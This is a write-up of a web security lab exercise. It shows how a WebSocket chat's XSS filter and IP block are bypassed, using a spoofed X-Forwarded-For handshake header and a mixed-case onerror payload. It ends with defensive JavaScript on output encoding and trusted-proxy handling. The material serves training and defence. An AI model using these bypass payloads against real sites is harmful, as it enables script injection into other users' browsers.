Manipulating the WebSocket handshake to exploit vulnerabilities

Description

This online shop has a live chat feature implemented using WebSockets.

It has an aggressive but flawed XSS filter.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

Approach

After accessing the lab, I enabled the FoxyProxy extension to route all requests through Burp Suite. Then I used the live chat feature on the site and checked the WebSocket history in Burp's Proxy tab, where I found my message being sent as this frame:

{"message":"This is my first message"}

My goal was to trigger an alert pop-up in the support agent's browser using an XSS payload. I attempted a simple XSS injection:

{"message":"<img src=1 onerror=alert(1)>"}

However, when I sent this request, I received the following response:

{"error":"Attack detected: Event handler"}

Additionally, my IP was blocked, preventing further communication over this WebSocket. To bypass the IP block, I used the X-Forwarded-For header: I pressed reconnect and added this header to the handshake request:

GET /chat HTTP/1.1
Host: 0a56006e0495981b8482d8ed00fa00ac.web-security-academy.net
X-Forwarded-For: 4.4.4.4
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Upgrade: websocket
Origin: https://0a56006e0495981b8482d8ed00fa00ac.web-security-academy.net
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=VwKkPu5lrx5w9wiHtK8GOWH1RQtAohhi
Sec-WebSocket-Key: 06gOIF/K3/BKQNG6e6MZFQ==

This tricked the server into thinking the request came from IP 4.4.4.4 instead of my blocked IP. After pressing connect, I successfully reconnected to the WebSocket.

To bypass the XSS filter, I used an obfuscated XSS payload. It keeps the same image-error trick, but the event handler name is mixed-case (so a keyword check for "onerror" does not match) and the function is called with a template literal instead of parentheses:

<img src=0 oNeRrOr=alert`1`>

I sent this payload and re-accessed the live chat page, making sure to add the X-Forwarded-For header each time. Upon doing this, I saw the alert box pop up, indicating the lab was solved. The same alert fired in the support agent's browser, confirming the success of the XSS attack.
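As an added example (not code from the lab or from PortSwigger), the JavaScript below models the two flawed controls this lab exercises, a keyword-blocklist "XSS filter" and an IP block that trusts X-Forwarded-For, beside the hardened equivalents a chat server should use; the function names and the trusted proxy address are assumptions.

```javascript
// Added example: flawed controls seen in the lab vs. hardened equivalents.

// Naive filter of the kind the lab models: a case-sensitive keyword blocklist.
// It rejects the obvious payload but lets a mixed-case handler name through,
// and anything it accepts is rendered in the agent's browser unescaped.
function naiveFilter(message) {
  const blocked = ["onerror", "onload", "<script"];
  for (const word of blocked) {
    if (message.includes(word)) {
      return { ok: false, error: "Attack detected: Event handler" };
    }
  }
  return { ok: true, html: message }; // unescaped: inserted into the DOM as-is
}

// Hardened handler: do not try to recognise attacks; make every message inert
// by HTML-encoding it before it reaches the support agent's page.
function escapeHtml(text) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#39;", "`": "&#96;",
  };
  return text.replace(/[&<>"'`]/g, (c) => map[c]);
}

function hardenedHandler(message) {
  return { ok: true, html: escapeHtml(message) };
}

// Client IP for blocking decisions. X-Forwarded-For is client-controlled
// unless the TCP connection comes from a proxy we operate; in that case use
// the hop the proxy appended last, not the first value (which the client sets).
const TRUSTED_PROXIES = new Set(["10.0.0.5"]); // assumed reverse proxy address

function clientIp(socketAddr, headers) {
  const xff = headers["x-forwarded-for"];
  if (!TRUSTED_PROXIES.has(socketAddr) || !xff) return socketAddr;
  const hops = xff.split(",").map((s) => s.trim()).filter(Boolean);
  return hops[hops.length - 1];
}
```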